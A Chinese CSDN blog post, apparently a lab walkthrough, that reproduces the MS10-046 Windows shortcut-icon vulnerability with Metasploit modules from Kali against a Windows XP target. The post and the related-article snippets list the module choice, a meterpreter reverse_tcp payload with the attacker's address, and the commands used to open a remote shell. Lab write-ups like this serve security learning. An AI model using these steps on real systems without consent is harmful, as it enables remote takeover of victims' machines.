MS10-046文件快捷方式漏洞复现与利用

最新推荐文章于 2023-07-29 23:23:36 发布
最新推荐文章于 2023-07-29 23:23:36 发布
阅读量4.9k 收藏 17
点赞数 5
分类专栏: 渗透测试 MSF KALI 文章标签: 安全 xp 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_58784379/article/details/121189659
版权
渗透测试 同时被 3 个专栏收录
82 篇文章 18 订阅
订阅专栏
KALI
28 篇文章 6 订阅
订阅专栏
MSF
21 篇文章 6 订阅
订阅专栏

攻击机:kali

靶机:windows xp sp2

使用metasploit框架,需要启用metasploit所依赖的postgresql数据库

在kali上启动postgresql命令【systemctl start postgresql】

如果想查看postgresql是否开启可以使用【systemctl status postgresql】,这里显示active表示已经打开

启动msfconsole

搜索ms10-046相应的模块

这里有两个可利用的模块,browser和smb

Metasploit中大部分exploit模块都会给出一个Rank的值,按模块的利用成功率会由低到高[Average→Normal→Good→Great→Excellent]

首先选择exploit/windows/browser/ms10_046_shortcut_icon_dllloader攻击模块[可以根据右边的编号use 0]

默认参数设置好了,exploit后等待反弹

在靶机上访问\\192.168.200.144\PKVDcB后

根据提示信息,已经建立session会话  

sessions -i 1进入meterpreter会话,输入shell拿权,ipconig查看靶机的IP信息  

或者也可以使用前面讲到的exploit/windows/smb/ms10_046_shortcut_icon_dllloader模块

同样的,搜索ms10-046

选择第二个攻击模块,show options查询需要配置的参数

设置所使用的payload、设置文件共享服务器的地址与反弹地址

与上个例子一样exploit后拿权  

bbb07
关注
  • 5
    点赞
  • 17
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
MS10-046漏洞利用
journeyIT的博客
01-10 326
MS10-046远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSFMetasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模块 4. set payloa...
MS10-046漏洞复现配合DNS欺骗
qq_43655183的博客
09-07 699
利用ms10_046漏洞生成攻击URL: 使用漏洞攻击模块 use exploit/windows/browser/ms10_046_shortcut_icon_dllloader 设置payload set payload windows/meterpreter/reverse_tcp 设置攻击参数 set SRVHOST 攻击机IP set LHOST 攻击机IP 开始渗透 run ...
漏洞复现---MS10-046漏洞
liu914589417的博客
04-27 5316
漏洞复现MS10-046漏洞 实验工具 1、VMware虚拟机 2、Windows7系统虚拟机 3、Kali 2021 系统虚拟机 1、在VMware中打开Windows7虚拟机和Kali 2021虚拟机,并确保两台机器处于同一网段,能互相ping通。 2、确定IP 地址和网络连接正常后,Kali 2021中输入命令【msfconsole】进入MSF攻击框架。 3、进入MSF攻击框架后,搜索MS10-046漏洞,输入命令【search ms10_046】,回车执行命令,搜索到下列漏洞。 4、引用编号
微软MS10-046漏洞利用
qq_50854662的博客
05-26 571
微软MS10-046漏洞利用 0x00 前言0x01 环境1. 目标机环境2. 攻击机环境3. 拓扑结构 0x02 过程1. 相互ping通2. 启动Metasploit3. 查找和MS10-046相关的模块4. 加载模块5. 设置所使用的payload6. 设置文件共享服务器的地址,应为BackTrack虚拟机的地址7. 设置目标主机被控制后反弹的地址,应为BackTrack虚拟机的地址8. exploit9. 查看会话10. 进入交互模式11. 拿到shell 0x00 前言 这是我
windoes ms10-046漏洞利用
小小猪的博客
10-29 451
windoes ms10-046漏洞利用 复现环境: 受害者:windoes 10 攻击者:kali 漏洞复现: 打开msf 查看是否出在ms10-046漏洞
ms10-046漏洞利用+bypassuac提权
m0_62008601的博客
11-24 1086
记一次ms10-046漏洞复现过程+bypassuac提权过程
使用metasploit攻击实例讲解1-ms10-046快捷方式图标漏洞
最新发布
12-29
本主题将深入探讨一个具体的实例,即“ms10-046快捷方式图标漏洞利用,以及如何通过Metasploit框架进行渗透测试。Metasploit是一款广泛使用的开源安全工具,它包含了大量预构建的攻击模块,便于安全专家进行漏洞...
MS10-070ASP.NETPaddingOracle信息泄露漏洞
03-02
说到这里,推荐一下ay暗影同学的利用视频:《paddingoraclevulattack》然后还有其他朋友在问这个漏洞的问题,那就索性做个科普好了。ASP.NET由于加密填充验证过程中处理错误不当,导致存在一个信息泄漏漏洞。成功...
MS10-046漏洞复现
weifengbbt的博客
11-08 1856
MS10-046漏洞复现0x00 前言0x01 环境0x02 过程0x03 结语0x04 建议 0x00 前言 这是我对msf里漏洞利用的学习记录 0x01 环境 1. 目标机环境 Windows xp sp3 IE7浏览器 2. 攻击机环境 kali 3. 拓扑结构 0x02 过程 1. 检查网络联通 ping 192.168.37.129 2. 启动Metasploit msfconsol...
lnk漏洞快捷方式漏洞)全面解析
weixin_34323858的博客
07-21 490
lnk漏洞快捷方式漏洞)全面解析 7月16日,Windows lnk漏洞快捷方式漏洞)的相关信息被披露,因为利用这个漏洞传播恶意软件具备“看一眼就中”的显著特性,立即引发安全厂商的高度关注。 本资料试图向公众完整解释与lnk漏洞快捷方式漏洞)有关的信息,提醒公众高度重视,尽早采取必要的防范措施。 lnk漏洞快捷方式漏洞)是什么? 在我们平时启动电脑上的程序时,很多情况下是先双击程序...
操作系统攻击:早期WindowsMS10-046漏洞
shelter1234567的博客
07-29 1126
本次介绍早期的windows高危漏洞——MS10_046_SHORTCUT_ICON_DLLLOADER ,该漏洞可以通过浏览器跳转网络资源的方式利用,结合xss攻击用户的系统 危险性极高。
MS10_046漏洞利用
彼岸花苏陌的博客
12-04 642
如果显示特制的快捷方式图标,则该漏洞可能允许远程执行代码。 成功利用漏洞的攻击者可以获得与本地用户相同的用户权限。 那些帐户被配置为拥有较少系统用户权限的用户比具有管理用户权限的用户受到的影响要小。 ...
windows 快捷方式(.lnk)代码执行漏洞(CVE-2017-8464 )[附EXP生成工具]
weixin_30566063的博客
08-12 186
最近看到网上曝光了一个windows远程代码执行的漏洞,黑客可以通过一个快捷方式在用户电脑上执行任意指令,于是便对该漏洞进行了部分分析。 1. 漏洞描述: MicrosoftWindows .LNK远程代码执行漏洞漏洞编号:CVE-2017-8464),攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理...
Metasploit(msf)系列-利用快捷方式漏洞进行渗透提权
chaojixiaojingang
09-26 3282
原理:        利用WinXP、Windows2000、Windows2003、Windows Vista等系统存在的漏洞:Windows Shell中的漏洞可能允许远程执行代码,如果显示特制的快捷方式图标,则可能允许远程执行代码,成功利用漏洞的攻击者拥有与本地用户相同的用户权限。 准备: 靶    机:VMware下的WinXP系统  IP:192.168.1.111 攻击主机:...
利用MS10-046漏洞攻击win7操作系统
afei001
03-27 2626
MS10-046简介     MS10-046是一个文件快捷方式漏洞,能利用这个漏洞提权直接获取到shell。 利用MS10-064攻击win7获取shell 实验环境: 攻击机:kali 靶机:win7-x86_64 1.开启kali和win7 2.kali中启动MSF找到MS10-046模块 root@kali:~# msfconsole #启动MSF ...
Metasploitable渗透测试实战:ms10-046
m0_60121089的博客
05-06 1463
1.漏洞描述 这是Windows Shell中一个公开披露的漏洞。如果显示特制快捷方式的图标,则该漏洞可能允许远程执行代码。成功利用漏洞的攻击者可以获得与本地用户相同的用户权限。与使用管理用户权限进行操作的用户相比,将其帐户配置为在系统上具有较少用户权限的用户受到的影响较小。 2.实战工具 软件:VMware Workstation 14 攻击机:kali(ip:192.168.240.143) 靶机:win7(ip:192.168.240.157) 3.漏洞利用 1.用ping命.
MS10-046漏洞测试
aozhuo4755的博客
11-09 712
这次用到MS10-046这个远程执行漏洞(Windows快捷方式LNK文件自动执行代码漏洞攻击) 命令: 1. msfconsole //启动MSFMetasploit 2. search ms10-046 //搜索漏洞 3. use windows/browser/ms10_046_shortcut_icon_dllloader //加载漏洞模...
ms10-046漏洞利用
07-25
引用\[1\]:微软MS10-046漏洞利用是指利用微软的一个漏洞MS10-046)来攻击目标机器。具体的利用过程如下: 1. 确保攻击机和目标机可以相互ping通。 2. 启动Metasploit框架。 3. 在Metasploit中查找和MS10-046漏洞相关的模块。 4. 加载相应的模块。 5. 设置所使用的payload,即攻击的载荷。 6. 设置文件共享服务器的地址,通常是BackTrack虚拟机的地址。 7. 设置目标主机被控制后反弹的地址,也是BackTrack虚拟机的地址。 8. 执行exploit命令,开始攻击。 9. 查看会话,确认是否成功建立了与目标机的连接。 10. 进入交互模式,可以执行各种操作。 11. 最终目标是获取目标机的shell权限,即完全控制目标机。\[1\] #### 引用[.reference_title] - *1* [微软MS10-046漏洞利用](https://blog.csdn.net/qq_50854662/article/details/117300012)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值